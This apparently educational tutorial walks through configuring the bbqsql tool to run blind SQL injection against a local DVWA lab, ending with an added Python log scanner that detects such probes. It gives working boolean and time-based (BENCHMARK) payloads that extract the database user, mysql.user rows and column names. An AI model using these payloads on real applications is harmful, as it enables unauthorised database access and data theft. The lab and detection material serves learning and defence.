Disclaimer: This information is provided for educational and professional use only.

What is needed:
bbqsql 1.1
Damn Vulnerable Web App (DVWA) v1.9
OWASP ZAP v2.4.3 / Burp

In this post I will be exploring how to make use of bbqsql by Neohapsis. bbqsql (https://github.com/Neohapsis/bbqsql) is a tool that can be used to conduct both normal SQL injection and blind SQL injection. It first made its appearance at Defcon 20 (https://www.defcon.org/images/defcon-20/dc-20-presentations/Toews-Behrens/DEFCON-20-Toews-Behrens-BBQSQL.pdf).

After conducting a small search on Google I found very limited resources about it. I guess this in turn would naturally lead to the application being used more sparingly.

bbqsql can be found in Kali 2.0. Unfortunately the version that is shipped has a coding error and it is advised to update to the newer version. My tests used version bbqsql 1.1.

Download the new version as follows:
$ pip install --upgrade bbqsql
In my case it was installed in /usr/local/bin/bbqsql. You can delete the old version that resides in /usr/bin and copy the one from /usr/local/bin/bbqsql over it:
$ whereis bbqsql
bbqsql: /usr/bin/bbqsql /usr/local/bin/bbqsql
$ cp /usr/local/bin/bbqsql /usr/bin/bbqsql
Check the version you have:
$ bbqsql -V
bbqsql 1.1 
Before starting make a note of the working directory. This is where your configuration is exported to and imported from.
$ pwd
/root/
$ bbqsql
Once you have the program up and running we need to go to DVWA and test the injection point. I will assume you have done the hard part and installed DVWA.

Login and downgrade the security difficulty level to low.

We will make use of the SQL Injection section in order to see the results, which allows us to judge a true and a false result. Once you have mastered this you can move to the Blind SQLi section. We know from experience with DVWA that there is an injection point on the page 'SQL Injection'. A simple ' will cause the system to produce an error, and if we enter ' or '0'='0 we get all the users listed. So we will use this injection point to insert a substring and comparison statement. A nice breakdown of what it does is presented in the Defcon 20 pdf.

So let's test this query. Notice that it makes use of the user() function in MySQL (http://dev.mysql.com/doc/refman/5.7/en/information-functions.html). Once you have this working, any query can be used from there on. More MySQL commands can be found in various cheat sheets like http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet.

DVWA low security:

This query provides a number of results ('User ID exists in the database.' on sqli_blind):
' or ascii(substr(user(),1,1))>0 #
Whereas the opposite provides none ('User ID is MISSING from the database.' on sqli_blind):
' or ascii(substr(user(),1,1))<0 #
These can be used to create the query template. Based on the examples provided, it becomes:

' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #

In this case we will use the variation in the content to identify a true or false statement.

Let's have a look at what options we need to set in the first menu. Option 1 'Setup HTTP Parameters' has a number of options. Let's focus on the ones we will be using.

Fig.1 - Setup HTTP Parameters

Option 2 'cookies' will be used to set the cookies. Make sure to set the right option otherwise you will get the wrong results back. DVWA looks at the cookie value sent to set the security settings before processing the request. I copied mine from ZAP.
'security': 'low', 'PHPSESSID': '0dfr898d44oh55movkfgrtfts7'
Next set the correct URL with the correct injection point. Remember the program supports a number of injection points: URL, cookie and data (check the slides for examples). Again use ZAP or tcpdump etc. to get the correct URL and arguments. In this case it is:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#
This is then changed to include the injection point:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1${injection}&Submit=Submit#
Option 5 'proxies' can be useful for debugging by using OWASP ZAP or Burp:
{"http": "127.0.0.1:8080"}
Option 7 'method'
get
Go back using '99' or 'done'
99
Option 2 'Setup BBQSQL Options' is where we setup the programs functionality.

Option 1 'technique' is for setting the technique; we will leave it at binary_search. Remember that if you enter a menu you need to set a value. Pressing Enter alone will set a NULL value.

Option 2 'comparison_attr' will be used quite often. Have a look at the different options. For now we will set it to content as we know it changes.
content
Finally, Option 5 'query' will hold our custom query. This is the one we created above:

' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #

bbqsql will make a number of test attempts and provide you with its results. If these are successful it will print out the results and ask you if you want to continue.

Fig. 2 - Setup BBQSQL Options (time-based) 

Once it is all setup exit 'Setup BBQSQL Options' and get ready to run bbqsql.
99
Because the program may crash, it is advised that you save your settings.
Once you have exported (i.e., saved) your config you can attempt to run it. This is achieved with Option 5 'Run Exploit' from the main menu.
5
If this works you will start to see the user and the IP address/hostname:
['root@localhost']

In the images I have provided you will have noticed that the commands are different. I have done a demo of a time-based attack and demonstrated it as well. The templates for it can be found below. Passing bbqsql through ZAP/Burp will allow you to better understand how it finds the data.

Fig. 3 - Execution and results of initial tests (time-based attack)

Fig. 4 - Extraction Results and Statistics


Fig. 5 - Final Results and Main Menu

Time-based Blind SQL Injection examples:

A simple function call example (I had to add ',1' as I was getting column-count errors; I checked this by entering it manually in the browser):

' UNION SELECT IF(ascii(substr(user(),1,1))>0,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

Query Template:

' UNION SELECT IF(ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

A more advanced select query (Here it is using offsetting to find the value):

' UNION SELECT IF(ascii(substr((SELECT user FROM mysql.user LIMIT 1 OFFSET 1),1,1))>0,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

Query Template (I have added ${sleep:50000}, but I have noticed it is not very effective as a variable; this 'time' method is faster compared to 'content' checking):

' UNION SELECT IF(ASCII(SUBSTR(( SELECT user FROM mysql.user LIMIT 1 OFFSET ${row_index:1} ),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(${sleep:50000},ENCODE('MSG','by X seconds')),null),1 #

Another query template example:

' UNION SELECT IF(ASCII(SUBSTR(( SELECT column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1 OFFSET ${row_index:1} ),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(${sleep:50000},ENCODE('MSG','by X seconds')),null),1 #
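From the defender's side, both the content-based template (ASCII/SUBSTR comparison) and the time-based templates above leave a very recognisable trail in the web server access log: one request per binary-search step, with the character index walking upwards. The following Python is an added example, not part of the post or of bbqsql, that scans constructed Apache-style log lines for that pattern and aggregates probes per client IP; the log lines, IPs and thresholds are all made up for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the post): three boolean probes on
# ASCII(SUBSTR(user(),n,1)) against sqli_blind, one BENCHMARK time-based probe
# built from the UNION SELECT IF(...) template, and one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2016:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20or%20ASCII%28SUBSTR%28user%28%29%2C1%2C1%29%29%3E64%20%23&Submit=Submit HTTP/1.1" 200 4512
10.0.0.5 - - [01/Jan/2016:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20or%20ASCII%28SUBSTR%28user%28%29%2C1%2C1%29%29%3E96%20%23&Submit=Submit HTTP/1.1" 200 4512
10.0.0.5 - - [01/Jan/2016:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20or%20ASCII%28SUBSTR%28user%28%29%2C2%2C1%29%29%3E112%20%23&Submit=Submit HTTP/1.1" 200 4490
10.0.0.9 - - [01/Jan/2016:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20UNION%20SELECT%20IF%28ASCII%28SUBSTR%28user%28%29%2C1%2C1%29%29%3E64%2CBENCHMARK%285000000%2CENCODE%28%27MSG%27%2C%27by%20X%20seconds%27%29%29%2Cnull%29%2C1%20%23&Submit=Submit HTTP/1.1" 200 4490
10.0.0.7 - - [01/Jan/2016:10:00:04 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4490
"""

# Combined log format: client IP, method, URL, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# The oracle the templates build: ASCII(SUBSTR(<expr>,<char_index>,1)) <cmp> <val>
BOOL_RE = re.compile(r'ASCII\s*\(\s*SUBSTR\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*[<>=]', re.I | re.S)
# Time-based variant wraps the same oracle in IF(..., BENCHMARK(...)/SLEEP(...)).
TIME_RE = re.compile(r'\b(BENCHMARK|SLEEP)\s*\(', re.I)

def classify_url(url):
    """Return (kind, char_index) for one URL; kind is 'time' or 'boolean', or (None, None)."""
    decoded = unquote_plus(url)          # probes arrive percent-encoded
    m = BOOL_RE.search(decoded)
    if not m:
        return None, None
    kind = 'time' if TIME_RE.search(decoded) else 'boolean'
    return kind, int(m.group(1))

def scan_log(text):
    """Per client IP: probe counts by kind and the character positions walked."""
    per_ip = defaultdict(lambda: {'boolean': 0, 'time': 0, 'positions': set()})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, url, _status = m.groups()
        kind, idx = classify_url(url)
        if kind:
            per_ip[ip][kind] += 1
            per_ip[ip]['positions'].add(idx)
    return dict(per_ip)

def alerts(per_ip, min_probes=2):
    """Sources at or above min_probes: repeated oracle queries, i.e. an extraction loop."""
    return sorted(ip for ip, s in per_ip.items() if s['boolean'] + s['time'] >= min_probes)
```

Raising min_probes in a real deployment trades false positives against how many characters an extraction may leak before it is flagged; a sudden rise in response times on the same URL is the complementary signal for the BENCHMARK variant.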
Try getting the same results with DVWA medium security and above.